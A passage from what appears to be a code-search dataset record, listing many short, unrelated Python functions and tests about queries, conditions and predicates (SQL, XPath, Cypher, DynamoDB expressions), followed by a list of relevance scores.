hash_key=True, name='this.is.id')\n data = bloop.Column(DocumentType)\n engine.bind(base=Model)\n\n no_id = Model.id.is_(None)\n path_condition = Model.data[\"Rating\"] >= 2\n condition = no_id & path_condition\n\n expected = {\n 'ExpressionAttributeNames': {\n '#n0': 'this.is.id', '#n2': 'Rating', '#n1': 'data'},\n 'ExpressionAttributeValues': {':v3': {'N': '2'}},\n 'ConditionExpression':\n '((attribute_not_exists(#n0)) AND (#n1.#n2 >= :v3))'}\n renderer.render(condition, \"condition\")\n assert renderer.rendered == expected", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def _getSQLWhere(self, inputTable, queryMeta):\n\t\tsqlPars = {}\n\t\tinputPars = dict((p.name, p.value) for p in inputTable.iterParams())\n\t\treturn base.joinOperatorExpr(\"AND\",\n\t\t\t[cd.asSQL(inputPars, sqlPars, queryMeta)\n\t\t\t\tfor cd in self.condDescs]), sqlPars", "def get_query(self, row_id):\n return self.get(row_id).query", "def get_resource_query(self):\n pass", "def get_resource_query(self):\n pass", "def query_fetchone(self, q, param=None):\r\n try:\r\n c = self.connection.cursor()\r\n if param is None:\r\n c.execute(q)\r\n else:\r\n c.execute(q, param)\r\n self.logger.log(logger.LogLevel.DEBUG, 'database.fetchone: %s | %s' % (q, param)) \r\n return c.fetchone()\r\n except Exception as e:\r\n self.logger.log(logger.LogLevel.ERROR, 'database.fetchone: %s. 
%s | %s' % (e, q, param))\r\n return False", "def get_query(self):\n return self.query_class(self)", "def test_predicate12(self):\n xpb = XPathBuilder()\n pred = (xpb.attr('d').equals('e')\n .log_and(xpb.foo.where(xpb.attr('z').equals('abc'))))\n xp = xpb.a.b.c.where(pred)\n exp = '/a/b/c[@d = \"e\" and /foo[@z = \"abc\"]]'\n self.assertEqual(xp.tostring(), exp)", "def visit_query(self, query):\n return query", "def getQuery(self):\n return self._query", "def where(self, *query):\n\n if query:\n query = query[0]\n\n if not isinstance(query, BaseElement):\n raise TypeError('{0}. {1} expected'.format(query, BaseElement))\n\n if self.query is None:\n self.query = query\n\n else:\n self.query &= query\n\n result = self\n\n else:\n result = self.query\n\n return result", "def get_query():\r\n table = query_queue_table\r\n\r\n s = table.select(order_by = sa.asc(table.c.date), limit = 1)\r\n s.append_whereclause(sa.and_(*[table.c.iden != i for i in running]))\r\n r = s.execute().fetchone()\r\n\r\n if r:\r\n return r.iden, r.query\r\n else:\r\n return None, None", "def get_query(self):\r\n\r\n split = self.path_s.split(\"?\", 1)\r\n if len(split) == 1: return \"\"\r\n else: return split[1]", "def query(monitorPoint) :\n return s.query(monitorPoint)", "def predicate (self, qx) :\n lhs = qx (self.lhs)\n op = self.op\n name = op.__name__\n op = _Op_Map_.get (name, op)\n return lhs._op_call (name, op, * self.args, ** self.kw)", "def test_predicate11(self):\n xpb = XPathBuilder()\n xp = xpb.a.b.c[(xpb.attr('d') == 'e') & xpb.foo[xpb.attr('z') == 'ab']]\n exp = '/a/b/c[@d = \"e\" and /foo[@z = \"ab\"]]'\n self.assertEqual(xp.tostring(), exp)", "def give_cond(self, idx):\n return self._conds[idx]", "def give_cond(self, idx):\n return self._conds[idx]", "def __get__(self, instance, owner):\r\n try:\r\n return instance._values[self.column.column_name].getval()\r\n except AttributeError as e:\r\n return self.query_evaluator", "def condition(self, evidence):\n return self.condition2( [x for x in evidence], [evidence[x] for x in evidence] )", "def _make_find_query(query):\n try:\n query = _sympify(query)\n except SympifyError:\n pass\n if isinstance(query, type):\n return lambda expr: isinstance(expr, query)\n elif isinstance(query, Basic):\n return lambda expr: expr.match(query) is not None\n return query", "def getCondition(self):\r\n return self.controller.getCondition()", "def apply_query(self, foreign, owner, foreign_key, local_key):\n return foreign.where(foreign_key, owner().__attributes__[local_key]).first()", "def check_deref_attr_var(self, node, ast):\n declarator = ast.declarator\n attrs = declarator.attrs\n meta = declarator.metaattrs\n ntypemap = ast.typemap\n is_ptr = declarator.is_indirect()\n\n deref = attrs[\"deref\"]\n if deref is not None:\n if deref not in [\"allocatable\", \"pointer\", \"raw\", \"scalar\"]:\n raise RuntimeError(\n \"Illegal value '{}' for deref attribute. 
\"\n \"Must be 'allocatable', 'pointer', 'raw', \"\n \"or 'scalar'.\".format(deref)\n )\n nindirect = declarator.is_indirect()\n if ntypemap.sgroup == \"vector\":\n if deref:\n mderef = deref\n else:\n # Copy vector to new array.\n mderef = \"allocatable\"\n elif nindirect != 2:\n raise RuntimeError(\n \"Can only have attribute 'deref' on arguments which\"\n \" return a pointer:\"\n \" '{}' at line {}\".format(ast.name, node.linenumber))\n elif meta[\"intent\"] == \"in\":\n raise RuntimeError(\n \"Cannot have attribute 'deref' on intent(in) argument:\"\n \" '{}' at line\".format(ast.name, node.linenumber))\n meta[\"deref\"] = attrs[\"deref\"]\n return\n\n # Set deref attribute for arguments which return values.\n intent = meta[\"intent\"]\n spointer = declarator.get_indirect_stmt()\n if ntypemap.name == \"void\":\n # void cannot be dereferenced.\n pass\n elif spointer in [\"**\", \"*&\"] and intent == \"out\":\n if ntypemap.sgroup == \"string\":\n # strings are not contiguous, so copy into argument.\n meta[\"deref\"] = \"copy\"\n else:\n meta[\"deref\"] = \"pointer\"", "def test_predicate10(self):\n xpb = XPathBuilder()\n pred = xpb.attr('foo').equals('bar').log_or(xpb.foobar)\n xp = xpb.foo.bar.where(pred)\n exp = '/foo/bar[@foo = \"bar\" or /foobar]'\n self.assertEqual(xp.tostring(), exp)", "def test_predicate6(self):\n xpb = XPathBuilder()\n xp = xpb.foobar.where(2)\n exp = '/foobar[2]'\n self.assertEqual(xp.tostring(), exp)", "def test_where_with_edge(self):\n class SomeNode(Node):\n \"\"\"Node example\"\"\"\n attr = attributes.AnyAttr(prop_name='node_name')\n\n class SomeEdge(Edge):\n \"\"\"Edge example\"\"\"\n attr = attributes.AnyAttr(prop_name='edge_name')\n\n query = (Query()\n .match(SomeNode, 'f')\n .where(SomeNode.attr == 2)\n .connected_through(SomeEdge, '_a')\n .where(SomeEdge.attr != '2')\n .with_('')\n )\n expected = '\\n'.join((\n 'MATCH (f:SomeNode)-[_a:SOMEEDGE]-(_b)',\n 'WHERE f.node_name = $a,',\n ' AND _a.edge_name <> $b',\n 'RETURN _a, _b, f',\n ))\n self.assertEqual(str(query), expected)\n\n expected = {'a': 2, 'b': '2'}\n self.assertEqual(query.get_vars(), expected)", "def query_rule(self, name, *args, **kwargs):\n return self.query(Predicate(name=name, args=args), **kwargs)", "def doQueryString(self, query) :\n\t\tqr = self.doQuery(query)['results']['bindings']\n\t\tif qr :\n\t\t\treturn qr[0].values()[0]['value']\n\t\telse :\n\t\t\treturn None", "def locate(self, column, cond_inp):\n\n try:\n return self.df_input.loc[self.df_input[column] == cond_inp]\n except Exception as e:\n print(e)", "def event_query(self, run=None, cond=None, ons=None):\n query = self.event_table[:, :]\n for i, key in enumerate([run, cond, ons]):\n if key is not None:\n query = query[(query[:, i] == key), :]\n return query", "def Q(self):\n return self._Q", "def _sql_where(self, cursor, table, prefix=None, aggregate=False):\n assert False, \"subclass responsibility\"", "def test_query_ot(self):\n term = next(self.OntTerm.query(label='deep'))\n assert term, 'oops?'", "def _query(self, p, k):\n raise NotImplementedError(\"This method must be implemented by the subclass\")", "def query(self, q):\r\n if self.is_empty:\r\n return None\r\n current = self.root\r\n i = 0\r\n while i < len(q):\r\n index = ord(q[i]) - 65 + 1\r\n if current.link[index] is not None:\r\n current = current.link[index]\r\n else:\r\n return None\r\n i += 1\r\n return current.highest_freq.string", "def simpleEqualsQuery(fluiddb, about):\n fluiddb.objects.get('fluiddb/about = \"%s\"' % about)", "def path_condition(self) -> 
Exp:\n return EAll(self.path_conditions())", "def query(self, query):\n cursor = self.database.cursor()\n cursor.execute(query)\n # If it's a query that's expected to return a value (EG: SELECT)\n if query.strip().lower().startswith('select'): return cursor.fetchall()", "def query_link_attribute(self, attribute, operation=None, value=None, link_type=None):\n link_attribute_dict = {}\n for name, link in self.links(link_type):\n try:\n if operation == None and value == None:\n link_attribute_dict[name] = getattr(link, attribute)\n else:\n link_attribute = getattr(link, attribute)\n if operation(link_attribute, value):\n link_attribute_dict[name] = link_attribute\n except AttributeError:\n pass\n return pd.Series(link_attribute_dict)", "def test_predicate7(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar[(xpb.attr('name') == 'foo') & (xpb.attr('x') == 'x')]\n exp = '/foo/bar[@name = \"foo\" and @x = \"x\"]'\n self.assertEqual(xp.tostring(), exp)", "def conditional(self) -> global___Statement.Conditional:", "def test_query_expression_parsing(self):\r\n query1 = self.table.filter(self.table.column('test_id') == 5)\r\n assert len(query1._where) == 1\r\n\r\n op = query1._where[0]\r\n assert isinstance(op.operator, operators.EqualsOperator)\r\n assert op.value == 5\r\n\r\n query2 = query1.filter(self.table.column('expected_result') >= 1)\r\n assert len(query2._where) == 2\r\n\r\n op = query2._where[1]\r\n assert isinstance(op.operator, operators.GreaterThanOrEqualOperator)\r\n assert op.value == 1", "def _is_query(act: Message):\n k = 'is_search_query'\n return k in act and act[k]", "def walk(predicate, cursor):\n return (c for c in cursor.walk_preorder() if predicate(c))", "def getQueryAnchor(self, context, metatype=None):\n for o in list(context.aq_chain):\n if IExtropyTracking.providedBy(o):\n if metatype is None:\n return o\n elif hasattr(o,'meta_type') and metatype == o.meta_type:\n return o\n return getToolByName(self, 'portal_url').getPortalObject()", "def where(condition):\n return partial(filter, condition)", "def activate_predicate(self):\n pass", "def query(d, key, val, operator='==', keynotfound=None):\n d = itertools.tee(d, 2)[1]\n if callable(operator):\n if not can_take_n_args(operator, 2):\n raise ValueError('operator must take at least 2 arguments')\n op = operator\n else:\n op = OPERATORS.get(operator, None)\n if not op:\n raise ValueError('operator must be one of %r' % OPERATORS)\n\n def try_op(func, x, y):\n try:\n result = func(x, y)\n return result\n except Exception:\n return False\n\n return (x for x in d if try_op(op, x.get(key, keynotfound), val))", "def query_device_handle(runtime, query_str):\r\n devices_manager = runtime.devices_manager\r\n dname, sname = query_str.split('.')\r\n\r\n dev = devices_manager.find_devices(dname)\r\n if dev is None:\r\n print(f'[Debug] Query {dname} from DevicesManager and got None.', file=sys.stderr)\r\n raise ValueError(f'Device {dname} not in database.')\r\n\r\n ret = dev.get_status_value(sname)\r\n if ret is None:\r\n print(f'[Debug] Query {dname}.{sname} from DevicesManager and got None.', file=sys.stderr)\r\n raise ValueError(f'Status {dname}.{sname} not in database.')\r\n\r\n return ret", "def predicate (self, qx) :\n try :\n rhs = qx (self.rhs)\n except Exception :\n rhs = self.rhs\n return _Aggr_ (qx, rhs, self.op_name)", "def query(self) -> Optional[str]:\n return pulumi.get(self, \"query\")", "def get_query(self, minimal: bool = False) -> Optional[str]:\n if minimal:\n return self.minimal_query\n return self.query", "def 
_query_and_fetchone(self, query):\n with self._connect() as conn:\n cur = conn.cursor()\n cur.execute(query)\n result = cur.fetchone()\n\n return result", "def conditional_value(self) -> global___Expression.ConditionalOperator:", "def prove(self, query, context):\n return self.askOne(query, context) != None", "def query(mdx_stmt):", "def passes(self, attribute, key, dictionary):\n return (\n config(\"database.DB\")\n .connection(self.connection)\n .table(self.table)\n .where(self.column, attribute)\n .first()\n is None\n )", "def simple_query(proposition):\n result = agent.kb.ask(expr(proposition))\n if result == None:\n print \"{0}: Unknown!\".format(proposition)\n else:\n print \"{0}: {1}\".format(proposition,result)", "def get(self, table, field, condition, *parameters, **kwparameters):\n data = self.select(table, field, condition, *parameters, **kwparameters)\n return data[0] if data else []", "def smart_query(collection, condition):\r\n smart_condition = list()\r\n for condition_key, condition_value in condition.iteritems():\r\n if isinstance(condition_value, dict):\r\n # We do not optimize complicate conditions.\r\n smart_condition.append({condition_key: condition_value})\r\n else:\r\n smart_condition.append({\"$or\": [\r\n {condition_key: condition_value},\r\n {condition_key: None},\r\n {condition_key: {\"$exists\": False}}\r\n ]})\r\n query_condition = {\"$and\": smart_condition}\r\n debug.print_as_json(query_condition)\r\n return query(collection, query_condition)", "def test_predicate4(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar.where(xpb.attr('name').not_equals('abc'))\n xp = xp.where(xpb.attr('x').equals('foo'))\n exp = '/foo/bar[@name != \"abc\"][@x = \"foo\"]'\n self.assertEqual(xp.tostring(), exp)", "def trackingQuery(self, node, REQUEST=None, **kw):\n node = self.getQueryAnchor(node)\n return self.localQuery(node, REQUEST, **kw)", "def query(self, point):\n if self.root is None:\n raise Exception('tree must be built first')\n return self.root.query(point)", "def visit_not_query(self, query):\n return query", "def test_where_with_node(self):\n class SomeNode(Node):\n \"\"\"Node example\"\"\"\n attr = attributes.AnyAttr(prop_name='name')\n\n query = (Query()\n .match(SomeNode, 'f')\n .where(SomeNode.attr == 2)\n .where('exists(f.something)')\n .where(SomeNode.attr != '2')\n )\n expected = '\\n'.join((\n 'MATCH (f:SomeNode)',\n 'WHERE f.name = $a',\n ' AND exists(f.something)',\n ' AND f.name <> $b',\n 'RETURN f',\n ))\n self.assertEqual(str(query), expected)\n\n expected = {'a': 2, 'b': '2'}\n self.assertEqual(query.get_vars(), expected)", "def query(self):\r\n raise NotImplementedError", "def doQueryURI(self, query) :\n\t\tqr = self.doQuery(query)\n\t\treturn qr['results']['bindings'][0]" ]
[ "0.5894116", "0.5894116", "0.5690017", "0.56574285", "0.5489223", "0.53180575", "0.52761585", "0.5190257", "0.51548445", "0.5123056", "0.5117761", "0.5093818", "0.5087869", "0.50837064", "0.5081821", "0.50449884", "0.5042481", "0.5036811", "0.5036811", "0.5036811", "0.50075585", "0.49784315", "0.4957777", "0.49568453", "0.49500743", "0.49165016", "0.4912225", "0.4908281", "0.4908281", "0.4908281", "0.4908281", "0.4908281", "0.4908281", "0.4892165", "0.48806044", "0.48710257", "0.48710257", "0.48708427", "0.4861586", "0.48576844", "0.48573864", "0.48346925", "0.48316717", "0.4813108", "0.48130402", "0.4806634", "0.48063117", "0.47859946", "0.47790375", "0.47790375", "0.47773248", "0.47731632", "0.4764525", "0.47576874", "0.47390744", "0.47321483", "0.47271377", "0.47246438", "0.47196883", "0.47178972", "0.47045064", "0.46981472", "0.46974462", "0.46921065", "0.46793067", "0.46791378", "0.46719965", "0.46657142", "0.46413913", "0.46381652", "0.4631314", "0.46285823", "0.462791", "0.46195158", "0.46113396", "0.46043435", "0.4589778", "0.45834416", "0.45809096", "0.4576282", "0.45744106", "0.457273", "0.45680565", "0.45578462", "0.45562863", "0.45537704", "0.45473346", "0.45455325", "0.45399436", "0.45325327", "0.4531119", "0.4527774", "0.45222765", "0.45206332", "0.45107147", "0.45021734", "0.45010862", "0.4499598", "0.449755", "0.44964266" ]
0.49621782
22
Check whether the job can be launched
def can_run(self): return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lantern_check():\n if not app.config.get(\"ENABLE_LANTERN\", False):\n print \"[{x}] Not checking Lantern jobs - interface disabled\".format(x=dates.now())\n return\n print \"[{x}] Checking Lantern jobs\".format(x=dates.now())\n LanternApi.check_jobs()", "def check_env():\n job_file = [\n x for x in sys.argv if x.endswith('py') and not x.endswith('__main__.py')]\n spark_submit = True if len(job_file) > 0 else False\n return spark_submit", "def can_run(self):\n\t\treturn self._start is None", "def _require_running(self):\n if self._state != JobManagerState.RUNNING:\n raise JobManagerInvalidStateError('job manager is not running')", "def check(args, session: Session = NEW_SESSION) -> None:\n if args.allow_multiple and not args.limit > 1:\n raise SystemExit(\"To use option --allow-multiple, you must set the limit to a value greater than 1.\")\n if args.hostname and args.local:\n raise SystemExit(\"You can't use --hostname and --local at the same time\")\n\n query = select(Job).where(Job.state == JobState.RUNNING).order_by(Job.latest_heartbeat.desc())\n if args.job_type:\n query = query.where(Job.job_type == args.job_type)\n if args.hostname:\n query = query.where(Job.hostname == args.hostname)\n if args.local:\n query = query.where(Job.hostname == get_hostname())\n if args.limit > 0:\n query = query.limit(args.limit)\n\n alive_jobs: list[Job] = [job for job in session.scalars(query) if job.is_alive()]\n\n count_alive_jobs = len(alive_jobs)\n if count_alive_jobs == 0:\n raise SystemExit(\"No alive jobs found.\")\n if count_alive_jobs > 1 and not args.allow_multiple:\n raise SystemExit(f\"Found {count_alive_jobs} alive jobs. Expected only one.\")\n if count_alive_jobs == 1:\n print(\"Found one alive job.\")\n else:\n print(f\"Found {count_alive_jobs} alive jobs.\")", "def isJobRunning ( self ):\n #cmd = \"qstat \" + str(self.jobid)\n \n #magicString='Unknown Job Id' ### magicString _might_ need to be changed if Torque version changes\n #(output, error) = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n\n if self.ofile_exists(): #output.find(magicString) >=0 or redhawkStatsRe.search(output):\n self.status = \"finished\"\n return False\n \n\n return True", "def test_valid_n_jobs(n_jobs: Any) -> None:\n check_n_jobs(n_jobs)", "def validate_ready_to_run(self):\n super(FlexibleMaster, self).validate_ready_to_run()\n if len(self._job_name_lst) < len(self._step_function_lst) + 1:\n raise ValueError(\"Not enough job names set.\")\n elif len(self._job_name_lst) > len(self._step_function_lst) + 1:\n raise ValueError(\"Not enough step functions set.\")", "def job_exists(self, job):\n\n with open(os.devnull, 'w') as devnull:\n result = subprocess.call(self.cli + [PlatformJenkinsJavaCLI.GET_JOB, job.name], stdout=devnull)\n\n return result == 0", "def _setJob_checkShot(shotPath):\n\tvalid = True\n\n\tjobPath = os.path.split(shotPath)[0]\n\t#jobDataDir = os.path.join(jobPath, os.environ['IC_METADATA'])\n\tshotDataDir = os.path.join(shotPath, os.environ['IC_METADATA'])\n\n\t# if not os.path.isdir(jobDataDir):\n\t# \tvalid = False\n\n\tif not os.path.isdir(shotDataDir):\n\t\tvalid = False\n\n\treturn valid", "def _check_for_finished_job(self):\n raise NotImplementedError", "def sanity_check_process(self):\n assert_equals(self.proc.returncode, None)\n time.sleep(1)", "def check_sp_job(self,\n label: str,\n job: 'JobAdapter',\n ):\n if 'mrci' in self.sp_level.method and job.level is not None and 'mrci' not in job.level.method:\n # This is a CCSD job ran 
before MRCI. Spawn MRCI\n self.run_sp_job(label)\n elif job.job_status[1]['status'] == 'done':\n self.post_sp_actions(label,\n sp_path=os.path.join(job.local_path_to_output_file),\n level=job.level,\n )\n # Update restart dictionary and save the yaml restart file:\n self.save_restart_dict()\n if self.species_dict[label].number_of_atoms == 1:\n # save the geometry from the sp job for monoatomic species for which no opt/freq jobs will be spawned\n self.output[label]['paths']['geo'] = job.local_path_to_output_file\n else:\n self.troubleshoot_ess(label=label,\n job=job,\n level_of_theory=job.level,\n )", "def test_check_opt_crashed(self):\n self.assertEqual(check_opt(self.jobset2.job), 'ocrashed')", "def _running_locally(coreapi_url, jobs_api_url):\n return not (coreapi_url and jobs_api_url)", "def test_matching_jobs_existing(self):\n self.assertEquals(\n self.query_api.get_matching_jobs(\n \"try\", \"146071751b1e\",\n 'Linux x86-64 try build'), json.loads(JOBS_SCHEDULE))", "def is_runnable(self):\n \n if len(target_tasks) < 1: \n return False\n # check task names?\n \n if self.run_folder is None or \\\n not os.path.exists(self.run_folder) or \\\n not os.path.exists(os.path.join(self.run_folder, self.run_id, 'SampleSheet.csv')):\n return False\n \n return True", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def jobserver_supported():\n return _MakeJobServer._singleton is not None", "def is_runnable(self):\n return self.state == self.STATE_INIT and not self.require", "def _is_working():\n global _worker\n return _worker is not None and _worker.is_alive()", "def checkRunning(procname):\n return procdata.checkRunning(procname)", "def check_availability(self):\n pass", "def _check_job_status(self):\n try:\n status = self.ee2.check_job_canceled({\"job_id\": self.job_id})\n except Exception as e:\n self.logger.error(\n f\"Warning: Job cancel check failed due to {e}. 
However, the job will continue to run.\"\n )\n return True\n if status.get(\"finished\", False):\n return False\n return True", "def check_jobs(self):\n # New/aborted jobs\n try:\n jobs = self.sm.get_job('%', phase = 'QUEUED')\n for job in jobs:\n self._launch_job(Job(job['job']))\n res = self.sm.get_aborted_jobs()\n aborts = [x['identifier'] for x in res]\n # Completed jobs\n for t in self.threads:\n if t.isDone() or t.name in aborts:\n self.threads.remove(t)\n # Set job status to COMPLETED\n job = Job(self.sm.get_job(t.name)[0]['job'])\n if t._Future__excpt == None:\n job.set_phase('COMPLETED')\n if t._Future__result != None:\n job.set_results(t._Future__result) \n status = True\n else:\n job.set_phase('ERROR')\n job.set_error_summary(str(t._Future__excpt[1]).replace(\"'\", \"\"))\n status = False\n job.set_end_time(datetime.utcnow().isoformat())\n self.sm.update_job(job = job, completed = status)\n except Exception, e:\n print \"Error:\", e", "def is_running(self,timeout=0):\n\n # wait for them to start\n import time\n st = time.time()\n still_waiting = 1\n while still_waiting:\n try:\n # Send a simple command to all workers\n # and wait till they handle it successfully\n self.exec_code(\"1==1\")\n except ClusterError:\n still_waiting = 1\n elapsed = time.time() - st\n if elapsed > timeout:\n # We've run out of time.\n return 0\n else:\n still_waiting = 0\n wait_time = time.time() - st\n # should we somehow dessiminate worker topology (ids)\n # to all machines here?\n return 1", "def is_available(self):\n try :\n p = subprocess.Popen([self.program_path, self.help_argument],stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n return p.wait() == self.help_return_code\n except OSError:\n return False", "def schedule(self, job: Job) -> bool:\n if self.num_avail_cores < job.num_cores:\n return False\n\n # Find the available cores\n num_cores_found = 0\n\n for i in range(self.num_cores):\n if self.core_status[i] == 0:\n # available\n\n self.core_status[i] = job.num_timesteps\n self.core_job_id[i] = job.id\n \n self.num_avail_cores -= 1\n num_cores_found += 1\n if num_cores_found >= job.num_cores:\n # found all the cores needed, we're done\n break\n \n return True", "def _check_results(self):\n if not 'EXECUTION OF GAMESS TERMINATED NORMALLY' in self.file_dic['output']:\n print self.job_name + \" didn't finish\"\n raise TypeError('Calculation didn\\'t finish')", "def test_cluster_jobs_script(self):\r\n\r\n qiime_config = load_qiime_config()\r\n submit_script = qiime_config['cluster_jobs_fp']\r\n\r\n if (submit_script):\r\n full_path = which(submit_script)\r\n if full_path:\r\n submit_script = full_path\r\n self.assertTrue(exists(submit_script),\r\n \"cluster_jobs_fp is not set to a valid path in qiime config: %s\" % submit_script)\r\n # check if executable\r\n self.assertTrue(access(submit_script, X_OK),\r\n \"cluster_jobs_fp is not executable: %s\" % submit_script)\r\n else:\r\n # Can't run in parallel, but not a critical error\r\n pass", "def check_running(process, min=1):\n if j.data.platform.is_linux():\n pids = get_pids(process)\n if len(pids) >= min:\n return True\n return False", "def chronos_job_is_ready(context, job_name):\n chronos_tools.wait_for_job(context.chronos_client, context.jobs[job_name]['name'])", "def run_command_check(self):\n pass", "def check_slurm_job_submission(expected_name):\n cmd = ['scontrol', 'show', 'job']\n job_id = 0\n found_job = False\n while True:\n while True:\n try:\n out = Popen(cmd, stdout=PIPE, stderr=PIPE).communicate()[0]\n break\n 
except:\n sleep(1)\n out = out.split('\\n')\n if 'error' in out[0]:\n sleep(1)\n msg = 'Error checking job status for {0}'.format(expected_name)\n logging.warning(msg)\n continue\n for line in out:\n for word in line.split():\n if 'JobId' in word:\n index = word.find('=') + 1\n job_id = int(word[index:])\n # continue\n if 'Name' in word:\n index = word.find('=') + 1\n if word[index:] == expected_name:\n found_job = True\n\n if found_job and job_id != 0:\n return found_job, job_id\n sleep(1)\n return found_job, job_id", "def _validate_jobs(\n self,\n check_nlst_warn: bool = False\n ):\n counter = 0\n for job in self.jobs:\n counter += 1\n print(job.job_id)\n if counter == 0:\n ignore_restarts = False\n else:\n ignore_restarts = True\n\n check_input_files(\n hrldas_namelist=job.hrldas_namelist,\n hydro_namelist=job.hydro_namelist,\n sim_dir=os.getcwd(),\n ignore_restarts=ignore_restarts,\n check_nlst_warn=check_nlst_warn\n )", "def _check_can_submit(self):\n if not self.parallel and self.last_submitted_i != self.highest_continuous_done_i:\n raise CannotSubmitNewTask(\n f\"Attempt to get task for {self} \"\n f\"out of order: last submitted {self.last_submitted_i}, \"\n f\"but highest_continuous_done_i is {self.highest_continuous_done_i}.\")\n if self.all_results_arrived:\n raise CannotSubmitNewTask(\n f\"Can't get {self} task: all results already arrived\")\n if self.final_task_submitted:\n raise CannotSubmitNewTask(\n \"Can't get {self} task: final task already submitted\")", "def launch(ctx, force):\n ctl = ctx.ctl\n jobs = ctl('list-avail', '--partition', 'main', flatten=False)\n\n if len(jobs) != 0 and not force:\n click.echo('Job already running', err=True)\n sys.exit(1)\n\n job = ctl('launch', '--partition', 'main')\n click.echo(job.get('id'))\n\n return 0", "def check_executable(op):\n try:\n proc = subprocess.Popen([op], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n except OSError:\n return False\n try:\n if proc.poll():\n proc.kill()\n except OSError:\n return True\n return True", "def check(self):\n exception = False\n for scalerThread in [self.preemptableScaler, self.scaler]:\n if scalerThread is not None:\n try:\n scalerThread.join(timeout=0)\n except Exception as e:\n logger.exception(e)\n exception = True\n if exception:\n raise RuntimeError('The cluster scaler has exited due to an exception')", "def _check_jobs_submitted(status, module):\n\n submitted = False\n if module in status.data:\n jobs = status.data[module]\n for job in jobs.keys():\n if job != 'pipeline_index':\n submitted = True\n break\n return submitted", "def checkBuildStatus(self):\n pass", "def should_run(self):\n return self.pod.file_exists('/gulpfile.js')", "def isFinished(self):\r\n try:\r\n output = Popen(\"qstat | grep \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n if self.jobId in output:\r\n if output.split()[4] == \"Eqw\":\r\n #If the job fails, print a warning, and wait a minute so the user can check why the job fails,\r\n #before resubmitting the job.\r\n logging.warning(\"job \" + output.split()[2] + \" failed to run, resubmitting in one minute\")\r\n time.sleep(60)\r\n output = Popen(\"qdel \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n self.submit()\r\n return False\r\n else:\r\n logging.info(\"job with ID: \" + self.jobId + \" is finished.\")\r\n return True\r\n \r\n except ValueError:\r\n logging.info(\"Error: waiting for not submitted job...\")", "def __which_job_is_running(self):\n\t\tp1 = 
subprocess.Popen('/usr/bin/atq',stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\t(atqout,stderr) = p1.communicate()\n\t\tfor line in atqout.splitlines():\n\t\t\tjob = line.split('\\t',1)[0]\n\t\t\tif job.isdigit():\n\t\t\t\tp2 = subprocess.Popen(['/usr/bin/at','-c',job], stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\t\t\t(atout,stderr) = p2.communicate()\n\t\t\t\tfor inst in INSTALLERS:\n\t\t\t\t\tif 'command' in INSTALLERS[inst]:\n\t\t\t\t\t\tcmd = INSTALLERS[inst]['command'].split('%')[0]\n\t\t\t\t\t\tMODULE.info(\" ++ Checking for '%s'\" % cmd)\n\t\t\t\t\t\tif cmd in atout:\n# cleaning up is done in 'run_installer()'\n#\t\t\t\t\t\t\tself._current_job = {}\n\t\t\t\t\t\t\tself._current_job['job'] = inst\t\t\t\t# job key\n\t\t\t\t\t\t\tself._current_job['running'] = True\t\t\t# currently running: we have found it per 'at' job\n\t\t\t\t\t\t\tself._current_job['time'] = int(time())\t\t# record the last time we've seen this job\n\t\t\t\t\t\t\tfor line in atout.split(\"\\n\"):\n\t\t\t\t\t\t\t\tmatch = re.search('^\\#\\:([a-z]+)\\:\\s(.*)$',line)\n\t\t\t\t\t\t\t\tif (match):\n\t\t\t\t\t\t\t\t\tvar = match.group(1)\n\t\t\t\t\t\t\t\t\tval = match.group(2)\n\t\t\t\t\t\t\t\t\t# restore numeric strings into numbers!\n\t\t\t\t\t\t\t\t\tif val.isdigit():\n\t\t\t\t\t\t\t\t\t\tself._current_job[var] = int(val)\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tself._current_job[var] = val\n\t\t\t\t\t\t\treturn inst\n\t\treturn ''", "def wait_on_job(self, delay=10):\n while self.isJobRunning() == True:\n time.sleep(delay)\n return self.ofile_exists()", "def is_running(self) -> bool:\n return False", "def wait_for_jobs(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"wait_for_jobs\")", "def check_requirement(self):\n raise NotImplementedError", "def can_run_experiment(self, info, device):\n nb_qubit_max = self.backends[device]['nq']\n nb_qubit_needed = info['nq']\n return nb_qubit_needed <= nb_qubit_max, nb_qubit_max, nb_qubit_needed", "def test_worker_precheck_exception(self):\n assert airflow.settings.validate_session()", "def wait_for_jobs(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"wait_for_jobs\")", "def start_check(self):\n pass", "def could_submit_new_task(self):\n try:\n self._check_can_submit()\n return True\n except CannotSubmitNewTask:\n return False", "def isstarted():", "def test_without_manager_defined():\n try:\n process = subprocess.check_output(['python', 'runserver.py'],\n env={},\n stderr=subprocess.STDOUT,\n shell=True)\n except subprocess.CalledProcessError as error:\n assert error.returncode != 0\n assert 'KeyError: None' in process.output\n assert 'JOB_MANAGER_IMPLEMENTATION' in process.output", "def check_for_work(self):\n print(\"validator: check for work\")\n self.check_for_analyzers()\n self.check_for_uploads()\n self.check_for_requests()", "def runRequirements(self):\n ready = (self.user[\"Save\"] != \"\" and self.user[\"Video\"] != \"\") or self.img_exist\n return ready", "def test_fastqc_exec_notexist():\n try:\n obj = fastqc.FastQC(os.path.join(\".\", \"fastqc\"))\n except NotExecutableError:\n return True\n else:\n return False", "def workers_ready(self, qty=None):\n agents = self.agents_status()\n if any([a['state'] != 'RUNNING' for a in agents]):\n return False\n if qty and len(agents) != qty:\n return False\n return True", "def 